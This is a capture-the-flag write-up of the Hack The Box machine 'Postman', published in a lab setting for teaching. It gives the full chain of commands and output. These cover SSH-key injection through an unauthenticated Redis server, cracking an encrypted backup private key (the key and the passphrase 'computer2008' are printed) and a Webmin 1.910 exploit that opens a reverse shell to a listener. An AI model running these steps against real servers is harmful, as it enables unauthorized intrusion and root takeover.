Nmap
Exploitation
Redis-cli
Post exploitation
Privilege escalation: redis to Matt
Enumeration
Linpeas
Privilege escalation: Matt to root
Enumeration
Pspy
Welcome to the Postman writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Postman
tags: HTB
Easy
Linux
Platform: Hackthebox
Difficult: Easy
S.O.: Linux
Link: Click here
Enumeration
Nmap
To get started, we run a quick open ports scan.
$ nmap -Pn -T4 -p- postman.htb
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-27 18:33 CEST
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.087s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
6379/tcp open redis
10000/tcp open snet-sensor-mgmt
Nmap done: 1 IP address (1 host up) scanned in 29.58 seconds
Now that we know the open ports, let's scan them in depth.
$ nmap -Pn -A -p 22,80,6379,10000 --script http-enum postman.htb
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-27 18:44 CEST
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.086s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-enum:
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_ /upload/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_http-server-header: Apache/2.4.29 (Ubuntu)
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.16 (93%), Linux 3.18 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Android 4.2.2 (Linux 3.4) (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 86.00 ms 10.10.14.1
2 86.33 ms postman.htb (10.10.10.160)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.25 seconds
As we can see, the server has a redis
service running. We will try to connect without credentials and see if it responds to an ECHO
.
$ redis-cli -h 10.10.10.160
10.10.10.160:6379> ECHO HELLO
"HELLO"
10.10.10.160:6379>
Nice! we can execute commands without authentication!
Exploitation
Redis-cli
Let's try to inject an SSH RSA key.
The first thing we have to do is load our id_rsa.pub
file into the server's memory.
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") | redis-cli -h 10.10.10.160 -x set x4v1l0k
OK
And now, we are going to the current directory as the SSH directory to be able to inject our key.
$ redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /home/redis/.ssh
(error) ERR Changing directory: Permission denied
Well, as we can see the user redis
does not have a home directory, so let's try its default installation path.
$ redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename authorized_keys
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379> quit
Great, now we should be able to connect via SSH using the injected RSA key.
$ ssh redis@10.10.10.160 -i id_rsa
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$
Post exploitation
Privilege escalation: redis to Matt
Enumeration
Linpeas
[...]
[+] Backup files
-rwxr-xr-x 1 Matt Matt 1743 Aug 26 2019 /opt/id_rsa.bak
[...]
By running linpeas
we can find a backup of the id_rsa ofMatt
.
redis@Postman:/tmp$ cat /opt/id_rsa.bak
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----
$ ssh matt@10.10.10.160 -i id_rsa
load pubkey "id_rsa": invalid format
Enter passphrase for key 'id_rsa':
When we try to connect using this id_rsa
we can see that it is protected so, we are going to try to recover the key.
$ ssh2john id_rsa > id_rsa_hash
$ john id_rsa_hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 (id_rsa)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:05 DONE (2021-06-27 20:38) 0.1901g/s 2726Kp/s 2726Kc/s 2726KC/sa6_123..*7¡Vamos!
Session completed
When we connect by SSH we see that it accepts the passphrase computer2008
but closes the connection at the moment.
$ ssh matt@10.10.10.160 -i id_rsa
load pubkey "id_rsa": invalid format
Enter passphrase for key 'id_rsa':
Connection closed by 10.10.10.160 port 22
Maybe we can use the passphrase as the password for user Matt.
redis@Postman:/tmp$ su Matt
Password:
Matt@Postman:/tmp$ id
uid=1000(Matt) gid=1000(Matt) groups=1000(Matt)
And now, we can read the user flag!.
Matt@Postman:/tmp$ cd
Matt@Postman:~$ cat user.txt
CENSORED_FLAG
Privilege escalation: Matt to root
Enumeration
Pspy
As we can see, webmin
is being run by root
.
2021/06/27 19:52:27 CMD: UID=0 PID=732 | /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf
And when accessing the webmin
service panel at the URL https://postman.htb:10000/sysinfo.cgi?xnavigation=1 the version of webmin
is 1.910
Looking a bit on the internet about vulnerabilities for this version, we can find a python exploit hosted in this Github repository.
Ok, it's time to exploit, let's put a terminal to listen and run it!
$ python exp.py --rhost 10.10.10.160 --rport 10000 --lhost 10.10.14.29 --lport 8787 -u Matt -p computer2008 -s yes
****************************** Webmin 1.910 Exploit By roughiz*******************************
*********************************************************************************************
*********************************************************************************************
*********************************************************************************************
****************************** Retrieve Cookies sid *****************************************
********** [+] [Exploit] The Cookie is 132613f2a51c54ed95206d3ec322389d
********************************************************************************************
****************************** Create payload and Exploit ***********************************
********** [+] [Exploit] Verify you nc listener on port 8787 for the incomming reverse shell
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.160] 49284
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
CENSORED_FLAG
And we are root and we can read his flag!